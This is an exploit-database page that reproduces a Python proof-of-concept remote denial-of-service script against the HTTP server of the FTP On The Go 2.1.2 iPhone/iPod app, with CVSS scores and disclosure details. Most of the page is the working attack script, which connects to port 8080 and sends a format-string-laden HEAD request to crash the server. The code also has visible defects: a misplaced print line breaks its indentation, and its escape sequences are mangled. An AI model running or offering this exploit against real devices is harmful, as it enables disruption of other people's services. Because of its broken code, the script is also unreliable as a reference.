Advertisement






Apple iPhone / iPod FTP On The Go 2.1.2 HTTP remote denial of service

CVE Category Price Severity
N/A CWE-400 Not specified High
Author Risk Exploitation Type Date
Not specified High Remote 2010-02-23
CPE
cpe:cpe:/a:apple:iphone_os:2.1.2
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2010020098

Below is a copy:

#!/usr/bin/python
#
# Apple Iphone/Ipod - FTP On The Go 2.1.2 - HTTP Remote Denial-of-Service Attack
# Found by: TecR0c
# Homepage: http://www.ftponthego.com/
# Download: From the Apple App Store - http://app2.it/topapp/286479936
# Tested on: IPhone 3G - firmware 3.1.2
# Notified vendor about vulnerability
#
# Download and install app > Go to Settings > enable Web Server
#

import socket
import sys

def Usage():
    print ("Usage: ./ftponthego.py <serv_ip>n")
    print ("Example: ./ftponthego.py 192.168.0.3n")
if len(sys.argv) <> 2:
        Usage()
        sys.exit(1)
else:
    hostname = sys.argv[1]
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        sock.connect((hostname, 8080))
print "[+] Connecting to the target.."
    except:
        print ("[-] Connection error!")
        sys.exit(1)
    print "[+] Sending evil payload.. "
    sock.send("HEAD %s%s%s%s%s%s%s%s%s%s%s%s%s%s%s HTTP/1.1rnrn")
    r=sock.recv(1024)
    sock.close()
    print "[+] HTTP Server is now DOSED!"
    sys.exit(0);



Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum